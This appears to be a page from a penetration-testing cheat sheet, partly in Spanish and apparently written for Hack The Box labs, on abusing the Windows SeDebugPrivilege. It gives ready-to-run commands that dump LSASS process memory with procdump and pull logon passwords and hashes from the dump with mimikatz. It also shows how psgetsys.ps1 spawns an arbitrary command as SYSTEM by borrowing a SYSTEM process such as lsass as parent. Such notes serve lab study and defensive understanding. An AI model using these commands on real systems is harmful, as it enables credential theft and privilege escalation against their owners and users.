search

Abuse of SeDebugPrivilege

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/debug-programsarrow-up-right

https://learn.microsoft.com/en-us/sysinternals/downloads/procdumparrow-up-right

https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Servicearrow-up-right

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoCarrow-up-right

C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\htb> mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

hashtag
Remote Code Execution as SYSTEM

https://github.com/decoder-it/psgetsystemarrow-up-right

Abrir PowerShell como administrador

# Obtener PID del proceso que se ejecuta como SYSTEM
PS C:\htb> tasklist
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<SYSTEM-PID>,<COMMAND-A-EJECUTAR>,"")
# or
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process 'lsass').Id,<COMMAND-A-EJECUTAR>,"")
PreviousAbuse of SeBackupPrivilegeNextAbuse of SeImpersonate and SeAssignPrimaryToken

Last updated